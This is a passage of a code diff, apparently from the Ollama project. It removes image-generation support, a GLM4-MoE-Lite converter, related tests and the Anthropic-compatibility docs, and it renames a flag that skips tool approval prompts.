- (void)systemWillPowerOff:(NSNotification *)notification {
-    // Set flag so applicationShouldTerminate: knows to allow termination.
-    // The system will call applicationShouldTerminate: after posting this notification.
-    self.systemShutdownInProgress = YES;
-}
-
 - (NSApplicationTerminateReply)applicationShouldTerminate:(NSApplication *)sender {
-    // Allow termination if the system is shutting down or restarting
-    if (self.systemShutdownInProgress) {
-        return NSTerminateNow;
-    }
-    // Otherwise just hide the app (for Cmd+Q, close button, etc.)
    [NSApp hide:nil];
    [NSApp setActivationPolicy:NSApplicationActivationPolicyAccessory];
    return NSTerminateCancel;
--- a/cmd/cmd.go
+++ b/cmd/cmd.go
@@ -46,9 +46,6 @@ import (
 	"github.com/ollama/ollama/types/syncmap"
 	"github.com/ollama/ollama/version"
 	xcmd "github.com/ollama/ollama/x/cmd"
-	"github.com/ollama/ollama/x/create"
-	xcreateclient "github.com/ollama/ollama/x/create/client"
-	"github.com/ollama/ollama/x/imagegen"
 )

 const ConnectInstructions = "To sign in, navigate to:\n    %s\n\n"
@@ -94,27 +91,11 @@ func CreateHandler(cmd *cobra.Command, args []string) error {
 	p := progress.NewProgress(os.Stderr)
 	defer p.Stop()

-	// Validate model name early to fail fast
-	modelName := args[0]
-	name := model.ParseName(modelName)
-	if !name.IsValid() {
-		return fmt.Errorf("invalid model name: %s", modelName)
-	}
-
 	var reader io.Reader

 	filename, err := getModelfileName(cmd)
 	if os.IsNotExist(err) {
 		if filename == "" {
-			// No Modelfile found - check if current directory is an image gen model
-			if create.IsTensorModelDir(".") {
-				quantize, _ := cmd.Flags().GetString("quantize")
-				return xcreateclient.CreateModel(xcreateclient.CreateOptions{
-					ModelName: modelName,
-					ModelDir:  ".",
-					Quantize:  quantize,
-				}, p)
-			}
 			reader = strings.NewReader("FROM .\n")
 		} else {
 			return errModelfileNotFound
@@ -136,28 +117,6 @@ func CreateHandler(cmd *cobra.Command, args []string) error {
 		return err
 	}

-	// Check if this is a tensor model (image generation) and handle it directly
-	quantize, _ := cmd.Flags().GetString("quantize")
-	modelDir := filepath.Dir(filename)
-	for _, cmd := range modelfile.Commands {
-		if cmd.Name == "model" {
-			if filepath.IsAbs(cmd.Args) {
-				modelDir = cmd.Args
-			} else {
-				modelDir = filepath.Join(filepath.Dir(filename), cmd.Args)
-			}
-			break
-		}
-	}
-	if create.IsTensorModelDir(modelDir) {
-		return xcreateclient.CreateModel(xcreateclient.CreateOptions{
-			ModelName: modelName,
-			ModelDir:  modelDir,
-			Quantize:  quantize,
-			Modelfile: xcreateclient.ExtractModelfileConfig(modelfile),
-		}, p)
-	}
-
 	status := "gathering model components"
 	spinner := progress.NewSpinner(status)
 	p.Add(status, spinner)
@@ -168,7 +127,8 @@ func CreateHandler(cmd *cobra.Command, args []string) error {
 	}
 	spinner.Stop()

-	req.Model = modelName
+	req.Model = args[0]
+	quantize, _ := cmd.Flags().GetString("quantize")
 	if quantize != "" {
 		req.Quantize = quantize
 	}
@@ -497,7 +457,6 @@ func RunHandler(cmd *cobra.Command, args []string) error {
 	}

 	name := args[0]
-
 	info, err := func() (*api.ShowResponse, error) {
 		showReq := &api.ShowRequest{Name: name}
 		info, err := client.Show(cmd.Context(), showReq)
@@ -559,18 +518,9 @@ func RunHandler(cmd *cobra.Command, args []string) error {
 		return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
 	}

-	// Check if this is an image generation model
-	if slices.Contains(info.Capabilities, model.CapabilityImage) {
-		if opts.Prompt == "" && !interactive {
-			return errors.New("image generation models require a prompt. Usage: ollama run " + name + " \"your prompt here\"")
-		}
-		return imagegen.RunCLI(cmd, name, opts.Prompt, interactive, opts.KeepAlive)
-	}
-
 	// Check for experimental flag
 	isExperimental, _ := cmd.Flags().GetBool("experimental")
-	yoloMode, _ := cmd.Flags().GetBool("experimental-yolo")
-	enableWebsearch, _ := cmd.Flags().GetBool("experimental-websearch")
+	yoloMode, _ := cmd.Flags().GetBool("yolo")

 	if interactive {
 		if err := loadOrUnloadModel(cmd, &opts); err != nil {
@@ -600,7 +550,7 @@ func RunHandler(cmd *cobra.Command, args []string) error {

 		// Use experimental agent loop with tools
 		if isExperimental {
-			return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive, yoloMode, enableWebsearch)
+			return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive, yoloMode)
 		}

 		return generateInteractive(cmd, opts)
@@ -706,11 +656,7 @@ func PushHandler(cmd *cobra.Command, args []string) error {

 			bar, ok := bars[resp.Digest]
 			if !ok {
-				msg := resp.Status
-				if msg == "" {
-					msg = fmt.Sprintf("pushing %s...", resp.Digest[7:19])
-				}
-				bar = progress.NewBar(msg, resp.Total, resp.Completed)
+				bar = progress.NewBar(fmt.Sprintf("pushing %s...", resp.Digest[7:19]), resp.Total, resp.Completed)
 				bars[resp.Digest] = bar
 				p.Add(resp.Digest, bar)
 			}
@@ -859,11 +805,11 @@ func DeleteHandler(cmd *cobra.Command, args []string) error {
 	for _, arg := range args {
 		// Unload the model if it's running before deletion
 		if err := loadOrUnloadModel(cmd, &runOptions{
 			Model:     arg,
 			KeepAlive: &api.Duration{Duration: 0},
 		}); err != nil {
 			if !strings.Contains(strings.ToLower(err.Error()), "not found") {
 				fmt.Fprintf(os.Stderr, "Warning: unable to stop model '%s'\n", arg)
 			}
 		}

@@ -1819,11 +1765,7 @@ func NewCLI() *cobra.Command {
 	runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
 	runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
 	runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
-	runCmd.Flags().Bool("experimental-yolo", false, "Skip all tool approval prompts (use with caution)")
-	runCmd.Flags().Bool("experimental-websearch", false, "Enable web search tool in experimental mode")
-
-	// Image generation flags (width, height, steps, seed, etc.)
-	imagegen.RegisterFlags(runCmd)
+	runCmd.Flags().BoolP("yolo", "y", false, "Skip all tool approval prompts (use with caution)")

 	stopCmd := &cobra.Command{
 		Use:     "stop MODEL",
@@ -1938,7 +1880,6 @@ func NewCLI() *cobra.Command {
 	} {
 		switch cmd {
 		case runCmd:
-			imagegen.AppendFlagsDocs(cmd)
 			appendEnvDocs(cmd, []envconfig.EnvVar{envVars["OLLAMA_HOST"], envVars["OLLAMA_NOHISTORY"]})
 		case serveCmd:
 			appendEnvDocs(cmd, []envconfig.EnvVar{
--- a/cmd/cmd_test.go
+++ b/cmd/cmd_test.go
@@ -1547,79 +1547,6 @@ func TestRunOptions_Copy_ThinkValueVariants(t *testing.T) {
 	}
 }

-func TestShowInfoImageGen(t *testing.T) {
-	var b bytes.Buffer
-	err := showInfo(&api.ShowResponse{
-		Details: api.ModelDetails{
-			Family:            "ZImagePipeline",
-			ParameterSize:     "10.3B",
-			QuantizationLevel: "FP8",
-		},
-		Capabilities: []model.Capability{model.CapabilityImage},
-		Requires:     "0.14.0",
-	}, false, &b)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	expect := "  Model\n" +
-		"    architecture    ZImagePipeline    \n" +
-		"    parameters      10.3B             \n" +
-		"    quantization    FP8               \n" +
-		"    requires        0.14.0            \n" +
-		"\n" +
-		"  Capabilities\n" +
-		"    image    \n" +
-		"\n"
-	if diff := cmp.Diff(expect, b.String()); diff != "" {
-		t.Errorf("unexpected output (-want +got):\n%s", diff)
-	}
-}
-
-func TestPushProgressMessage(t *testing.T) {
-	tests := []struct {
-		name    string
-		status  string
-		digest  string
-		wantMsg string
-	}{
-		{
-			name:    "uses status when provided",
-			status:  "uploading model",
-			digest:  "sha256:abc123456789def",
-			wantMsg: "uploading model",
-		},
-		{
-			name:    "falls back to digest when status empty",
-			status:  "",
-			digest:  "sha256:abc123456789def",
-			wantMsg: "pushing abc123456789...",
-		},
-		{
-			name:    "handles short digest gracefully",
-			status:  "",
-			digest:  "sha256:abc",
-			wantMsg: "pushing sha256:abc...",
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			msg := tt.status
-			if msg == "" {
-				if len(tt.digest) >= 19 {
-					msg = fmt.Sprintf("pushing %s...", tt.digest[7:19])
-				} else {
-					msg = fmt.Sprintf("pushing %s...", tt.digest)
-				}
-			}
-			if msg != tt.wantMsg {
-				t.Errorf("got %q, want %q", msg, tt.wantMsg)
-			}
-		})
-	}
-}
-
 func TestRunOptions_Copy_Independence(t *testing.T) {
 	// Test that modifications to original don't affect copy
 	originalThink := &api.ThinkValue{Value: "original"}
--- a/cmd/interactive.go
+++ b/cmd/interactive.go
@@ -116,7 +116,7 @@ func generateInteractive(cmd *cobra.Command, opts runOptions) error {
 		Prompt:         ">>> ",
 		AltPrompt:      "... ",
 		Placeholder:    "Send a message (/? for help)",
-		AltPlaceholder: "Press Enter to send",
+		AltPlaceholder: `Use """ to end multi-line input`,
 	})
 	if err != nil {
 		return err
--- a/convert/convert.go
+++ b/convert/convert.go
@@ -311,8 +311,6 @@ func LoadModelMetadata(fsys fs.FS) (ModelKV, *Tokenizer, error) {
 		conv = &deepseekocr{}
 	case "DeepseekV3ForCausalLM":
 		conv = &deepseek2Model{}
-	case "Glm4MoeLiteForCausalLM":
-		conv = &glm4MoeLiteModel{}
 	default:
 		return nil, nil, fmt.Errorf("unsupported architecture %q", p.Architectures[0])
 	}
--- a/convert/convert_glm4moelite.go
+++ b/convert/convert_glm4moelite.go
@@ -1,150 +0,0 @@
-package convert
-
-import (
-	"cmp"
-	"fmt"
-	"log/slog"
-	"regexp"
-	"strconv"
-
-	"github.com/ollama/ollama/fs/ggml"
-)
-
-type glm4MoeLiteModel struct {
-	ModelParameters
-	MaxPositionEmbeddings uint32  `json:"max_position_embeddings"`
-	HiddenSize            uint32  `json:"hidden_size"`
-	HiddenLayers          uint32  `json:"num_hidden_layers"`
-	IntermediateSize      uint32  `json:"intermediate_size"`
-	NumAttentionHeads     uint32  `json:"num_attention_heads"`
-	NumKeyValueHeads      uint32  `json:"num_key_value_heads"`
-	RMSNormEPS            float32 `json:"rms_norm_eps"`
-
-	RopeTheta     float32 `json:"rope_theta"`
-	QKNopeHeadDim uint32  `json:"qk_nope_head_dim"`
-	QKRopeHeadDim uint32  `json:"qk_rope_head_dim"`
-	KVLoraRank    uint32  `json:"kv_lora_rank"`
-	QLoraRank     uint32  `json:"q_lora_rank"`
-	VHeadDim      uint32  `json:"v_head_dim"`
-
-	ExpertCount            uint32  `json:"n_routed_experts"`
-	ExpertSharedCount      uint32  `json:"n_shared_experts"`
-	ExpertIntermediateSize uint32  `json:"moe_intermediate_size"`
-	ExpertUsedCount        uint32  `json:"num_experts_per_tok"`
-	ExpertWeightsNorm      bool    `json:"norm_topk_prob"`
-	ExpertWeightsScale     float32 `json:"routed_scaling_factor"`
-
-	LeadingDenseBlockCount uint32 `json:"first_k_dense_replace"`
-}
-
-func (p *glm4MoeLiteModel) KV(t *Tokenizer) KV {
-	kv := p.ModelParameters.KV(t)
-	kv["general.architecture"] = "glm4moelite"
-	kv["general.type"] = "model"
-	kv["glm4moelite.block_count"] = p.HiddenLayers
-
-	numHeads := p.NumAttentionHeads
-	numKVHeads := p.NumKeyValueHeads
-
-	kv["glm4moelite.attention.head_count"] = numHeads
-	kv["glm4moelite.attention.head_count_kv"] = numKVHeads
-	kv["glm4moelite.attention.key_length"] = p.QKNopeHeadDim + p.QKRopeHeadDim
-	kv["glm4moelite.attention.kv_lora_rank"] = p.KVLoraRank
-	kv["glm4moelite.attention.layer_norm_rms_epsilon"] = p.RMSNormEPS
-	kv["glm4moelite.attention.q_lora_rank"] = p.QLoraRank
-	kv["glm4moelite.attention.value_length"] = p.VHeadDim
-	kv["glm4moelite.context_length"] = p.MaxPositionEmbeddings
-	kv["glm4moelite.embedding_length"] = p.HiddenSize
-	kv["glm4moelite.expert_count"] = p.ExpertCount
-	kv["glm4moelite.expert_feed_forward_length"] = p.ExpertIntermediateSize
-	kv["glm4moelite.expert_shared_count"] = p.ExpertSharedCount
-
-	kv["glm4moelite.expert_gating_func"] = uint32(2)
-	kv["glm4moelite.expert_used_count"] = p.ExpertUsedCount
-	kv["glm4moelite.expert_weights_norm"] = p.ExpertWeightsNorm
-	kv["glm4moelite.expert_weights_scale"] = p.ExpertWeightsScale
-	kv["glm4moelite.feed_forward_length"] = p.IntermediateSize
-	kv["glm4moelite.leading_dense_block_count"] = p.LeadingDenseBlockCount
-
-	kv["glm4moelite.rope.dimension_count"] = p.QKRopeHeadDim
-	kv["glm4moelite.rope.freq_base"] = cmp.Or(p.RopeTheta, float32(1000000.0))
-
-	kv["tokenizer.ggml.pre"] = "glm4"
-
-	return kv
-}
-
-func (p *glm4MoeLiteModel) Replacements() []string {
-	return []string{
-		"lm_head", "output",
-		"model.embed_tokens", "token_embd",
-		"model.norm", "output_norm",
-		"model.layers", "blk",
-		"input_layernorm", "attn_norm",
-		"self_attn.kv_a_proj_with_mqa", "attn_kv_a_mqa",
-		"self_attn.kv_a_layernorm", "attn_kv_a_norm",
-		"self_attn.kv_b_proj", "attn_kv_b",
-		"self_attn.q_a_proj", "attn_q_a",
-		"self_attn.q_a_layernorm", "attn_q_a_norm",
-		"self_attn.q_b_proj", "attn_q_b",
-		"self_attn.o_proj", "attn_output",
-		"post_attention_layernorm", "ffn_norm",
-		"mlp.shared_experts.down_proj", "ffn_down_shexp",
-		"mlp.shared_experts.gate_proj", "ffn_gate_shexp",
-		"mlp.shared_experts.up_proj", "ffn_up_shexp",
-		"mlp.gate_proj", "ffn_gate",
-		"mlp.down_proj", "ffn_down",
-		"mlp.up_proj", "ffn_up",
-		"mlp.gate.e_score_correction_bias", "exp_probs_b.bias",
-		"mlp.gate", "ffn_gate_inp",
-	}
-}
-
-func (p *glm4MoeLiteModel) Tensors(s []Tensor) (out []*ggml.Tensor) {
-	merges := make([]merge, p.HiddenLayers*3)
-	for i := range p.HiddenLayers {
-		merges[i*3+0] = merge{
-			fmt.Sprintf("blk.%d.mlp.experts.*.gate_proj.weight", i),
-			fmt.Sprintf("blk.%d.ffn_gate_exps.weight", i),
-		}
-		merges[i*3+1] = merge{
-			fmt.Sprintf("blk.%d.mlp.experts.*.up_proj.weight", i),
-			fmt.Sprintf("blk.%d.ffn_up_exps.weight", i),
-		}
-		merges[i*3+2] = merge{
-			fmt.Sprintf("blk.%d.mlp.experts.*.down_proj.weight", i),
-			fmt.Sprintf("blk.%d.ffn_down_exps.weight", i),
-		}
-	}
-
-	skipLayer := func(n string, minValue uint32) bool {
-		re := regexp.MustCompile(`^blk\.(\d+)`)
-		matches := re.FindStringSubmatch(n)
-		if matches == nil {
-			return false
-		}
-
-		blkNum, err := strconv.Atoi(matches[1])
-		if err != nil {
-			return false
-		}
-
-		return uint32(blkNum) >= minValue
-	}
-
-	out, s = mergeTensors(s, merges...)
-	for _, t := range s {
-		// skip any additional layers (such as the Multi-Token Prediction layer)
-		if skipLayer(t.Name(), p.HiddenLayers) {
-			slog.Debug("skipping layer", "name", t.Name())
-			continue
-		}
-		out = append(out, &ggml.Tensor{
-			Name:     t.Name(),
-			Kind:     t.Kind(),
-			Shape:    t.Shape(),
-			WriterTo: t,
-		})
-	}
-	return out
-}
--- a/docs/README.md
+++ b/docs/README.md
@@ -14,7 +14,6 @@
 * [API Reference](https://docs.ollama.com/api)
 * [Modelfile Reference](https://docs.ollama.com/modelfile)
 * [OpenAI Compatibility](https://docs.ollama.com/api/openai-compatibility)
-* [Anthropic Compatibility](./api/anthropic-compatibility.mdx)

 ### Resources

--- a/docs/api.md
+++ b/docs/api.md
@@ -16,7 +16,6 @@
 - [Generate Embeddings](#generate-embeddings)
 - [List Running Models](#list-running-models)
 - [Version](#version)
-- [Experimental: Image Generation](#image-generation-experimental)

 ## Conventions

@@ -59,15 +58,6 @@ Advanced parameters (optional):
 - `keep_alive`: controls how long the model will stay loaded into memory following the request (default: `5m`)
 - `context` (deprecated): the context parameter returned from a previous request to `/generate`, this can be used to keep a short conversational memory

-Experimental image generation parameters (for image generation models only):
-
-> [!WARNING]
-> These parameters are experimental and may change in future versions.
-
-- `width`: width of the generated image in pixels
-- `height`: height of the generated image in pixels
-- `steps`: number of diffusion steps
-
 #### Structured outputs

 Structured outputs are supported by providing a JSON schema in the `format` parameter. The model will generate a response that matches the schema. See the [structured outputs](#request-structured-outputs) example below.
@@ -1877,55 +1867,3 @@ curl http://localhost:11434/api/version
  "version": "0.5.1"
 }
 ```
-
-## Experimental Features
-
-### Image Generation (Experimental)
-
-> [!WARNING]
-> Image generation is experimental and may change in future versions.
-
-Image generation is now supported through the standard `/api/generate` endpoint when using image generation models. The API automatically detects when an image generation model is being used.
-
-See the [Generate a completion](#generate-a-completion) section for the full API documentation. The experimental image generation parameters (`width`, `height`, `steps`) are documented there.
-
-#### Example
-
-##### Request
-
-```shell
-curl http://localhost:11434/api/generate -d '{
-  "model": "x/z-image-turbo",
-  "prompt": "a sunset over mountains",
-  "width": 1024,
-  "height": 768
-}'
-```
-
-##### Response (streaming)
-
-Progress updates during generation:
-
-```json
-{
-  "model": "x/z-image-turbo",
-  "created_at": "2024-01-15T10:30:00.000000Z",
-  "completed": 5,
-  "total": 20,
-  "done": false
-}
-```
-
-##### Final Response
-
-```json
-{
-  "model": "x/z-image-turbo",
-  "created_at": "2024-01-15T10:30:15.000000Z",
-  "image": "iVBORw0KGgoAAAANSUhEUg...",
-  "done": true,
-  "done_reason": "stop",
-  "total_duration": 15000000000,
-  "load_duration": 2000000000
-}
-```
--- a/docs/api/anthropic-compatibility.mdx
+++ b/docs/api/anthropic-compatibility.mdx
@@ -1,408 +0,0 @@
----
-title: Anthropic compatibility
----
-
-Ollama provides compatibility with the [Anthropic Messages API](https://docs.anthropic.com/en/api/messages) to help connect existing applications to Ollama, including tools like Claude Code.
-
-## Recommended models
-
-For coding use cases, models like `glm-4.7:cloud`, `minimax-m2.1:cloud`, and `qwen3-coder` are recommended.
-
-Pull a model before use:
-```shell
-ollama pull qwen3-coder
-ollama pull glm-4.7:cloud
-```
-
-## Usage
-
-### Environment variables
-
-To use Ollama with tools that expect the Anthropic API (like Claude Code), set these environment variables:
-
-```shell
-export ANTHROPIC_AUTH_TOKEN=ollama  # required but ignored
-export ANTHROPIC_BASE_URL=http://localhost:11434
-export ANTHROPIC_API_KEY=ollama  # required but ignored
-```
-
-### Simple `/v1/messages` example
-
-<CodeGroup dropdown>
-
-```python basic.py
-import anthropic
-
-client = anthropic.Anthropic(
-    base_url='http://localhost:11434',
-    api_key='ollama',  # required but ignored
-)
-
-message = client.messages.create(
-    model='qwen3-coder',
-    max_tokens=1024,
-    messages=[
-        {'role': 'user', 'content': 'Hello, how are you?'}
-    ]
-)
-print(message.content[0].text)
-```
-
-```javascript basic.js
-import Anthropic from "@anthropic-ai/sdk";
-
-const anthropic = new Anthropic({
-  baseURL: "http://localhost:11434",
-  apiKey: "ollama", // required but ignored
-});
-
-const message = await anthropic.messages.create({
-  model: "qwen3-coder",
-  max_tokens: 1024,
-  messages: [{ role: "user", content: "Hello, how are you?" }],
-});
-
-console.log(message.content[0].text);
-```
-
-```shell basic.sh
-curl -X POST http://localhost:11434/v1/messages \
--H "Content-Type: application/json" \
--H "x-api-key: ollama" \
--H "anthropic-version: 2023-06-01" \
--d '{
-  "model": "qwen3-coder",
-  "max_tokens": 1024,
-  "messages": [{ "role": "user", "content": "Hello, how are you?" }]
-}'
-```
-
-</CodeGroup>
-
-### Streaming example
-
-<CodeGroup dropdown>
-
-```python streaming.py
-import anthropic
-
-client = anthropic.Anthropic(
-    base_url='http://localhost:11434',
-    api_key='ollama',
-)
-
-with client.messages.stream(
-    model='qwen3-coder',
-    max_tokens=1024,
-    messages=[{'role': 'user', 'content': 'Count from 1 to 10'}]
-) as stream:
-    for text in stream.text_stream:
-        print(text, end='', flush=True)
-```
-
-```javascript streaming.js
-import Anthropic from "@anthropic-ai/sdk";
-
-const anthropic = new Anthropic({
-  baseURL: "http://localhost:11434",
-  apiKey: "ollama",
-});
-
-const stream = await anthropic.messages.stream({
-  model: "qwen3-coder",
-  max_tokens: 1024,
-  messages: [{ role: "user", content: "Count from 1 to 10" }],
-});
-
-for await (const event of stream) {
-  if (
-    event.type === "content_block_delta" &&
-    event.delta.type === "text_delta"
-  ) {
-    process.stdout.write(event.delta.text);
-  }
-}
-```
-
-```shell streaming.sh
-curl -X POST http://localhost:11434/v1/messages \
--H "Content-Type: application/json" \
--d '{
-  "model": "qwen3-coder",
-  "max_tokens": 1024,
-  "stream": true,
-  "messages": [{ "role": "user", "content": "Count from 1 to 10" }]
-}'
-```
-
-</CodeGroup>
-
-### Tool calling example
-
-<CodeGroup dropdown>
-
-```python tools.py
-import anthropic
-
-client = anthropic.Anthropic(
-    base_url='http://localhost:11434',
-    api_key='ollama',
-)
-
-message = client.messages.create(
-    model='qwen3-coder',
-    max_tokens=1024,
-    tools=[
-        {
-            'name': 'get_weather',
-            'description': 'Get the current weather in a location',
-            'input_schema': {
-                'type': 'object',
-                'properties': {
-                    'location': {
-                        'type': 'string',
-                        'description': 'The city and state, e.g. San Francisco, CA'
-                    }
-                },
-                'required': ['location']
-            }
-        }
-    ],
-    messages=[{'role': 'user', 'content': "What's the weather in San Francisco?"}]
-)
-
-for block in message.content:
-    if block.type == 'tool_use':
-        print(f'Tool: {block.name}')
-        print(f'Input: {block.input}')
-```
-
-```javascript tools.js
-import Anthropic from "@anthropic-ai/sdk";
-
-const anthropic = new Anthropic({
-  baseURL: "http://localhost:11434",
-  apiKey: "ollama",
-});
-
-const message = await anthropic.messages.create({
-  model: "qwen3-coder",
-  max_tokens: 1024,
-  tools: [
-    {
-      name: "get_weather",
-      description: "Get the current weather in a location",
-      input_schema: {
-        type: "object",
-        properties: {
-          location: {
-            type: "string",
-            description: "The city and state, e.g. San Francisco, CA",
-          },
-        },
-        required: ["location"],
-      },
-    },
-  ],
-  messages: [{ role: "user", content: "What's the weather in San Francisco?" }],
-});
-
-for (const block of message.content) {
-  if (block.type === "tool_use") {
-    console.log("Tool:", block.name);
-    console.log("Input:", block.input);
-  }
-}
-```
-
-```shell tools.sh
-curl -X POST http://localhost:11434/v1/messages \
--H "Content-Type: application/json" \
--d '{
-  "model": "qwen3-coder",
-  "max_tokens": 1024,
-  "tools": [
-    {
-      "name": "get_weather",
-      "description": "Get the current weather in a location",
-      "input_schema": {
-        "type": "object",
-        "properties": {
-          "location": {
-            "type": "string",
-            "description": "The city and state"
-          }
-        },
-        "required": ["location"]
-      }
-    }
-  ],
-  "messages": [{ "role": "user", "content": "What is the weather in San Francisco?" }]
-}'
-```
-
-</CodeGroup>
-
-## Using with Claude Code
-
-[Claude Code](https://code.claude.com/docs/en/overview) can be configured to use Ollama as its backend:
-
-```shell
-ANTHROPIC_AUTH_TOKEN=ollama ANTHROPIC_BASE_URL=http://localhost:11434 ANTHROPIC_API_KEY=ollama claude --model qwen3-coder
-```
-
-Or set the environment variables in your shell profile:
-
-```shell
-export ANTHROPIC_AUTH_TOKEN=ollama
-export ANTHROPIC_BASE_URL=http://localhost:11434
-export ANTHROPIC_API_KEY=ollama
-```
-
-Then run Claude Code with any Ollama model:
-
-```shell
-# Local models
-claude --model qwen3-coder
-claude --model gpt-oss:20b
-
-# Cloud models
-claude --model glm-4.7:cloud
-claude --model minimax-m2.1:cloud
-```
-
-## Endpoints
-
-### `/v1/messages`
-
-#### Supported features
-
-- [x] Messages
-- [x] Streaming
-- [x] System prompts
-- [x] Multi-turn conversations
-- [x] Vision (images)
-- [x] Tools (function calling)
-- [x] Tool results
-- [x] Thinking/extended thinking
-
-#### Supported request fields
-
-- [x] `model`
-- [x] `max_tokens`
-- [x] `messages`
-  - [x] Text `content`
-  - [x] Image `content` (base64)
-  - [x] Array of content blocks
-  - [x] `tool_use` blocks
-  - [x] `tool_result` blocks
-  - [x] `thinking` blocks
-- [x] `system` (string or array)
-- [x] `stream`
-- [x] `temperature`
-- [x] `top_p`
-- [x] `top_k`
-- [x] `stop_sequences`
-- [x] `tools`
-- [x] `thinking`
-- [ ] `tool_choice`
-- [ ] `metadata`
-
-#### Supported response fields
-
-- [x] `id`
-- [x] `type`
-- [x] `role`
-- [x] `model`
-- [x] `content` (text, tool_use, thinking blocks)
-- [x] `stop_reason` (end_turn, max_tokens, tool_use)
-- [x] `usage` (input_tokens, output_tokens)
-
-#### Streaming events
-
-- [x] `message_start`
-- [x] `content_block_start`
-- [x] `content_block_delta` (text_delta, input_json_delta, thinking_delta)
-- [x] `content_block_stop`
-- [x] `message_delta`
-- [x] `message_stop`
-- [x] `ping`
-- [x] `error`
-
-## Models
-
-Ollama supports both local and cloud models.
-
-### Local models
-
-Pull a local model before use:
-
-```shell
-ollama pull qwen3-coder
-```
-
-Recommended local models:
-- `qwen3-coder` - Excellent for coding tasks
-- `gpt-oss:20b` - Strong general-purpose model
-
-### Cloud models
-
-Cloud models are available immediately without pulling:
-
-- `glm-4.7:cloud` - High-performance cloud model
-- `minimax-m2.1:cloud` - Fast cloud model
-
-### Default model names
-
-For tooling that relies on default Anthropic model names such as `claude-3-5-sonnet`, use `ollama cp` to copy an existing model name:
-
-```shell
-ollama cp qwen3-coder claude-3-5-sonnet
-```
-
-Afterwards, this new model name can be specified in the `model` field:
-
-```shell
-curl http://localhost:11434/v1/messages \
-    -H "Content-Type: application/json" \
-    -d '{
-        "model": "claude-3-5-sonnet",
-        "max_tokens": 1024,
-        "messages": [
-            {
-                "role": "user",
-                "content": "Hello!"
-            }
-        ]
-    }'
-```
-
-## Differences from the Anthropic API
-
-### Behavior differences
-
-- API key is accepted but not validated
-- `anthropic-version` header is accepted but not used
-- Token counts are approximations based on the underlying model's tokenizer
-
-### Not supported
-
-The following Anthropic API features are not currently supported:
-
-| Feature | Description |
-|---------|-------------|
-| `/v1/messages/count_tokens` | Token counting endpoint |
-| `tool_choice` | Forcing specific tool use or disabling tools |
-| `metadata` | Request metadata (user_id) |
-| Prompt caching | `cache_control` blocks for caching prefixes |
-| Batches API | `/v1/messages/batches` for async batch processing |
-| Citations | `citations` content blocks |
-| PDF support | `document` content blocks with PDF files |
-| Server-sent errors | `error` events during streaming (errors return HTTP status) |
-
-### Partial support
-
-| Feature | Status |
-|---------|--------|
-| Image content | Base64 images supported; URL images not supported |
-| Extended thinking | Basic support; `budget_tokens` accepted but not enforced |
--- a/docs/api/openai-compatibility.mdx
+++ b/docs/api/openai-compatibility.mdx
@@ -275,73 +275,6 @@ curl -X POST http://localhost:11434/v1/chat/completions \
 - [x] `dimensions`
 - [ ] `user`

-### `/v1/images/generations` (experimental)
-
-> Note: This endpoint is experimental and may change or be removed in future versions.
-
-Generate images using image generation models.
-
-<CodeGroup dropdown>
-
-```python images.py
-from openai import OpenAI
-
-client = OpenAI(
-    base_url='http://localhost:11434/v1/',
-    api_key='ollama',  # required but ignored
-)
-
-response = client.images.generate(
-    model='x/z-image-turbo',
-    prompt='A cute robot learning to paint',
-    size='1024x1024',
-    response_format='b64_json',
-)
-print(response.data[0].b64_json[:50] + '...')
-```
-
-```javascript images.js
-import OpenAI from "openai";
-
-const openai = new OpenAI({
-  baseURL: "http://localhost:11434/v1/",
-  apiKey: "ollama", // required but ignored
-});
-
-const response = await openai.images.generate({
-  model: "x/z-image-turbo",
-  prompt: "A cute robot learning to paint",
-  size: "1024x1024",
-  response_format: "b64_json",
-});
-
-console.log(response.data[0].b64_json.slice(0, 50) + "...");
-```
-
-```shell images.sh
-curl -X POST http://localhost:11434/v1/images/generations \
--H "Content-Type: application/json" \
--d '{
-  "model": "x/z-image-turbo",
-  "prompt": "A cute robot learning to paint",
-  "size": "1024x1024",
-  "response_format": "b64_json"
-}'
-```
-
-</CodeGroup>
-
-#### Supported request fields
-
-- [x] `model`
-- [x] `prompt`
-- [x] `size` (e.g. "1024x1024")
-- [x] `response_format` (only `b64_json` supported)
-- [ ] `n`
-- [ ] `quality`
-- [ ] `style`
-- [ ] `user`
-
 ### `/v1/responses`

 > Note: Added in Ollama v0.13.3
--- a/docs/capabilities/web-search.mdx
+++ b/docs/capabilities/web-search.mdx
@@ -110,7 +110,7 @@ More Ollama [Python example](https://github.com/ollama/ollama-python/blob/main/e
 import { Ollama } from "ollama";

 const client = new Ollama();
-const results = await client.webSearch("what is ollama?");
+const results = await client.webSearch({ query: "what is ollama?" });
 console.log(JSON.stringify(results, null, 2));
 ```

@@ -213,7 +213,7 @@ models](https://ollama.com/models)\n\nAvailable for macOS, Windows, and Linux',
 import { Ollama } from "ollama";

 const client = new Ollama();
-const fetchResult = await client.webFetch("https://ollama.com");
+const fetchResult = await client.webFetch({ url: "https://ollama.com" });
 console.log(JSON.stringify(fetchResult, null, 2));
 ```

--- a/docs/docs.json
+++ b/docs/docs.json
@@ -32,9 +32,7 @@
    "codeblocks": "system"
  },
  "contextual": {
-    "options": [
-      "copy"
-    ]
+    "options": ["copy"]
  },
  "navbar": {
    "links": [
@@ -54,9 +52,7 @@
      "display": "simple"
    },
    "examples": {
-      "languages": [
-        "curl"
-      ]
+      "languages": ["curl"]
    }
  },
  "redirects": [
@@ -101,7 +97,6 @@
          {
            "group": "Integrations",
            "pages": [
-              "/integrations/claude-code",
              "/integrations/vscode",
              "/integrations/jetbrains",
              "/integrations/codex",
@@ -111,9 +106,7 @@
              "/integrations/zed",
              "/integrations/roo-code",
              "/integrations/n8n",
-              "/integrations/xcode",
-              "/integrations/onyx",
-              "/integrations/marimo"
+              "/integrations/xcode"
            ]
          },
          {
@@ -146,8 +139,7 @@
              "/api/streaming",
              "/api/usage",
              "/api/errors",
-              "/api/openai-compatibility",
